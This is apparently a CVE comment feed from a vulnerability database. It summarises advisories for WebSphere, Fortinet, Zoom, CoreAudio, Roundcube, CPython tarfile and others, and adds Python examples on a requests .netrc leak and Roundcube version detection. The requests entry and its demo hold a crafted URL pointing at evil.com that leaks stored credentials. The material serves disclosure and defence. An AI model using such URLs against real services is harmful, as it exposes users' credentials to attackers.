https://cve.circl.lu/comments/feed
Most recent comment. Feed updated 2025-07-08T09:01:28.160297+00:00. Generated by Vulnerability-Lookup (info@circl.lu) with python-feedgen. Contains only the 10 most recent comments.

---
Comment: https://cve.circl.lu/comment/62e17ecb-0345-4b1c-b7d6-343410dd1084
Title: PH65941: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)
Author: Hans-Petter Fjeld (http://cvepremium.circl.lu/user/atluxity)
Published: 2025-04-23T08:25:20.348540+00:00
Updated: 2025-07-08T09:01:28.177164+00:00

**Abstract**
IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)

**Download Description**
PH65941 resolves the following problem:
ERROR DESCRIPTION: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)
PROBLEM SUMMARY: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)
PROBLEM CONCLUSION: Confidential for CVE-2025-27907. The fix for this APAR is targeted for inclusion in 8.5.5.28, 9.0.5.24. For more information, see Recommended Updates for WebSphere Application Server: https://www.ibm.com/support/pages/node/715553

**Prerequisites**
None

**Problems Solved**
PH65941

Source: https://www.ibm.com/support/pages/node/7231182

---
Comment: https://cve.circl.lu/comment/a79b754d-9252-4580-8912-42f39c854661
Title: Additional information
Author: Patrick Boulvin (http://cvepremium.circl.lu/user/Belspo)
Published: 2025-05-14T08:54:41.802843+00:00
Updated: 2025-07-08T09:01:28.177040+00:00

Microsoft discovered critical vulnerability CVE-2025-27920 affecting the messaging application Output Messenger. Microsoft additionally observed exploitation of the vulnerability since April 2024. According to Microsoft, the attacker needs to be authenticated, although the Output Messenger advisory indicates that privileges are not required to exploit the vulnerability. An attacker could upload malicious files into the server’s startup directory by exploiting this directory traversal vulnerability.

This allows an attacker to gain indiscriminate access to the communications of every user, steal sensitive data and impersonate users, possibly leading to operational disruptions, unauthorized access to internal systems, and widespread credential compromise.

---
Comment: https://cve.circl.lu/comment/48d3bc1d-ce6b-4a0d-93f6-aec07945969d
Title: Authentication Vulnerability in FortiOS, FortiProxy, and FortiSwitchManager leads to Unauthenticated Admin Access
Author: Cédric Bonhomme (http://cvepremium.circl.lu/user/cedric)
Published: 2025-05-15T12:16:29.052130+00:00
Updated: 2025-07-08T09:01:28.176915+00:00

### Risks
FortiOS, FortiProxy, and FortiSwitchManager are core components of Fortinet’s network security and management infrastructure, which provide firewalling, proxy services, and centralized switch management. CVE-2025-22252 is a missing authentication vulnerability that allows an unauthenticated attacker with knowledge of an existing admin account to access the device as a valid admin. Exploitation of this flaw could grant attackers unauthorized control over network infrastructure, threatening confidentiality through data exposure, integrity via configuration tampering, and availability by disrupting critical services.

### Description
CVE-2025-22252 is a missing authentication for critical function vulnerability in devices configured to use a remote TACACS+ server for authentication configured to use ASCII authentication. It may allow an attacker with knowledge of an existing admin account to access the device as a valid admin via an authentication bypass, potentially resulting in complete system compromise, data theft and service disruption.

---
Comment: https://cve.circl.lu/comment/eff35358-2a58-408d-8c52-0b1143adc25c
Title: Additional information
Author: Patrick Boulvin (http://cvepremium.circl.lu/user/Belspo)
Published: 2025-05-16T07:10:54.871730+00:00
Updated: 2025-07-08T09:01:28.176791+00:00

Description

In its security release of 13 May 2025, Zoom addressed two vulnerabilities that could be exploited for privilege escalation:

• CVE-2025-30663, a time-of-check time-of-use race condition affecting some Zoom Workplace Apps. If successfully exploited, an authenticated user could conduct an escalation of privilege via local access.
• CVE-2025-30664 is an improper neutralization of special elements flaw affecting some Zoom Workplace Apps. Successful exploitation could allow an authenticated user to conduct an escalation of privilege via local access.

---
Comment: https://cve.circl.lu/comment/da6e2e7d-cb96-4560-bf1a-27df4962776e
Title: More information
Author: Patrick Boulvin (http://cvepremium.circl.lu/user/Belspo)
Published: 2025-05-22T07:24:41.759993+00:00
Updated: 2025-07-08T09:01:28.176655+00:00

The vulnerabilities could be used by attackers to gain access to services and data. They can also be used to execute arbitrary commands and cause a denial of service. Confidentiality, integrity and availability are all impacted. The only solution is to upgrade immediately.

---
Comment: https://cve.circl.lu/comment/78842211-36a0-4523-9e9a-ea14c1b05b21
Title: More details about CVE-2025-31200
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Published: 2025-06-02T20:43:39.581242+00:00
Updated: 2025-07-08T09:01:28.176510+00:00

On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great. I’m featured. You should watch…you’re probably here from that anyways).

As he mentioned in the video, “Another security researcher by the name of ‘Noah’ was able to tweak the values such that when it was played on MacOS, it actually did lead to a crash.” I think it’s still worth it to write about that ‘tweaking’ process in more detail. I had just finished another project and ended up on a spreadsheet maintained by Project Zero which tracks zero days that have been actively exploited in the wild. It just so happened that that day there had been another addition: CVE-2025-31200. I couldn’t find any writeups on it, or really any information other than the fact that it was a “memory corruption in CoreAudio” so I decided to have a look myself. How hard could it be?

For more details: [https://blog.noahhw.dev/posts/cve-2025-31200/](https://blog.noahhw.dev/posts/cve-2025-31200/)

---
Comment: https://cve.circl.lu/comment/a5ae6fa3-504b-4d03-a153-b9f12f911f71
Title: Netrc credential leak in PSF requests library
Author: Cédric Bonhomme (http://cvepremium.circl.lu/user/cedric)
Published: 2025-06-04T05:03:44.190775+00:00
Updated: 2025-07-08T09:01:28.176319+00:00

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

`requests.get('http://example.com:@evil.com/')`

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.

---
Comment: https://cve.circl.lu/comment/eaca75c8-db5f-490c-a54a-c24729db5728
Title: Nuclei template to detect CVE-2025-49113 (Roundcube / Webmail)
Author: Cédric Bonhomme (http://cvepremium.circl.lu/user/cedric)
Published: 2025-06-04T13:24:17.697301+00:00
Updated: 2025-07-08T09:01:28.173583+00:00

This template looks at the HTML body for the rcversion value and then matches on vulnerable versions. Here is a mapping of the RAW HTML value and version mapping for Roundcube:

* 10502 1.5.2
* 10601 1.6.1
* 10506 1.5.6
* 10500 1.5.0
* 10609 1.6.9
* 10611 1.6.11
* 10510 1.5.10
* 10505 1.5.5
* 10503 1.5.3
* 10610 1.6.10
* 10509 1.5.9
* 10607 1.6.7
* 10602 1.6.2
* 10606 1.6.6
* 10605 1.6.5

[More information](https://github.com/rxerium/CVE-2025-49113).

---
Comment: https://cve.circl.lu/comment/aaaf84c7-8007-4de5-b99f-ae9a91d6e26d
Title: More details about PayU wordpress extension
Author: Alexandre Dulaunoy (http://cvepremium.circl.lu/user/adulau)
Published: 2025-06-11T12:34:29.562531+00:00
Updated: 2025-07-08T09:01:28.170646+00:00

"This can be abused by a malicious actor to perform action which normally should only be able to be executed by higher privileged users. These actions might allow the malicious actor to gain admin access to the website." as mentioned in https://patchstack.com/database/wordpress/plugin/payu-india/vulnerability/wordpress-payu-india-plugin-3-8-5-account-takeover-vulnerability?_s_id=cve

---
Comment: https://cve.circl.lu/comment/85c55b2b-8a7a-4d34-89ec-52e38ed8903c
Title: Additional information
Author: Patrick Boulvin (http://cvepremium.circl.lu/user/Belspo)
Published: 2025-06-25T13:07:32.040392+00:00
Updated: 2025-07-08T09:01:28.167239+00:00

RISK: Multiple vulnerabilities affect the standard TarFile library for CPython. Currently, there is no indication that the vulnerability is actively exploited, but because it is a zero-day with a substantial install base, attackers can exploit it at any moment.

An attacker could exploit flaws to bypass safety checks when extracting compressed files, allowing them to write files outside intended directories, create malicious links, or tamper with system files even when protections are supposedly enabled. Successful exploitation could lead to unauthorised access, data corruption, or malware installation, especially if your systems or third-party tools handle untrusted file uploads or archives.

RECOMMENDED ACTION: Patch

Source: ccb.be
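The `.netrc` leak described in Cédric Bonhomme's requests comment above, as an added example that is not part of the original comment or of the requests project. It mirrors the host extraction at the linked `utils.py` lines (`netloc.split(":")[0]`) beside a variant that uses the hostname `urllib.parse` actually resolves the connection to, and runs both against a constructed `.netrc` entry. The hardened variant is this example's own choice, not a statement of how the maintainers fixed the issue; the credential values are made up.

```python
import os
import tempfile
from netrc import netrc
from urllib.parse import urlparse

# Constructed .netrc content for the example; not a real credential.
NETRC_TEXT = "machine example.com login alice password s3cret\n"


def load_netrc(text):
    """Parse netrc text with the stdlib parser via a private temp file (mkstemp is 0600)."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as f:
        f.write(text)
    try:
        return netrc(path)
    finally:
        os.unlink(path)


def netrc_host_vulnerable(url):
    """Mirror of the linked requests/utils.py lines: netloc up to the first ':'.

    For 'http://example.com:@evil.com/' the netloc is 'example.com:@evil.com',
    so this returns 'example.com' although the request goes to evil.com.
    """
    return urlparse(url).netloc.split(":")[0]


def netrc_host_hardened(url):
    """Use the parsed hostname, i.e. the host the TCP connection is made to."""
    return urlparse(url).hostname


def connection_host(url):
    """Where the request would actually be sent (same parse the transport uses)."""
    return urlparse(url).hostname


def lookup(nrc, host):
    """Return (login, password) for host, or None when no netrc entry matches."""
    auth = nrc.authenticators(host)
    return None if auth is None else (auth[0], auth[2])


def demo(url):
    """Show which credentials each host-selection rule would attach to a request for url."""
    nrc = load_netrc(NETRC_TEXT)
    return {
        "connects_to": connection_host(url),
        "vulnerable_sends": lookup(nrc, netrc_host_vulnerable(url)),
        "hardened_sends": lookup(nrc, netrc_host_hardened(url)),
    }


if __name__ == "__main__":
    for u in ("http://example.com:@evil.com/", "http://example.com/", "http://example.com:8080/"):
        print(u, demo(u))
```

For the crafted URL the vulnerable rule attaches alice's credentials to a request that connects to evil.com; the hardened rule finds no entry for evil.com and sends nothing. Passing `auth=` explicitly, as the comment's workaround suggests, sidesteps the netrc lookup entirely.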
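The rcversion mapping in the Roundcube comment above, as an added example that is neither the Nuclei template nor Roundcube's code. It decodes the raw integer with the formula the table follows (major*10000 + minor*100 + patch), checks that formula against every pair quoted in the comment, and flags versions in the ranges CVE-2025-49113 affects (before 1.5.10, and 1.6.x before 1.6.11, the fixed releases named in Roundcube's advisory). The HTML fragments and the regular expression locating `rcversion` are constructed for the example and assumed to resemble the login page, not captured from a real server.

```python
import re

# Raw rcversion -> version pairs quoted in the comment above.
TABLE = {
    10502: "1.5.2", 10601: "1.6.1", 10506: "1.5.6", 10500: "1.5.0", 10609: "1.6.9",
    10611: "1.6.11", 10510: "1.5.10", 10505: "1.5.5", 10503: "1.5.3", 10610: "1.6.10",
    10509: "1.5.9", 10607: "1.6.7", 10602: "1.6.2", 10606: "1.6.6", 10605: "1.6.5",
}

# Fixed releases for CVE-2025-49113 per the Roundcube advisory: 1.5.10 and 1.6.11.
FIXED_1_5 = (1, 5, 10)
FIXED_1_6 = (1, 6, 11)

# Assumed shape of the disclosure in the page body, e.g. rcmail.set_env({... "rcversion":10611 ...}).
RCVERSION_RE = re.compile(r'rcversion["\']?\s*:\s*(\d+)')


def decode_rcversion(raw):
    """Unpack major*10000 + minor*100 + patch into a comparable tuple."""
    n = int(raw)
    return (n // 10000, (n // 100) % 100, n % 100)


def table_is_consistent(table=TABLE):
    """True if the decoder reproduces every pair in the comment's table."""
    return all(".".join(map(str, decode_rcversion(k))) == v for k, v in table.items())


def is_vulnerable(version):
    """Affected: anything below 1.5.10 (including EOL 1.4 and older), and 1.6.0 through 1.6.10."""
    if version < FIXED_1_5:
        return True
    if version[:2] == (1, 6) and version < FIXED_1_6:
        return True
    return False


def assess(html):
    """Extract rcversion from a page body and classify it; None when no version is disclosed."""
    m = RCVERSION_RE.search(html)
    if not m:
        return None
    v = decode_rcversion(m.group(1))
    return {"version": ".".join(map(str, v)), "vulnerable": is_vulnerable(v)}


# Constructed page fragments (not captured from real servers).
SAMPLES = {
    "vulnerable": '<script>rcmail.set_env({"task":"login","rcversion":10609});</script>',
    "patched": '<script>rcmail.set_env({"task":"login","rcversion":10611});</script>',
    "unknown": "<html><body>no version here</body></html>",
}

if __name__ == "__main__":
    print("table consistent:", table_is_consistent())
    for name, html in SAMPLES.items():
        print(name, assess(html))
```

Decoding the integer instead of matching a fixed list of raw values means releases not in the table (1.5.4, 1.4.x, a future 1.6.12) are classified by range rather than silently missed, which is the usual failure mode of version-list templates. A version match is only a hint that a host is unpatched; it does not confirm exploitability.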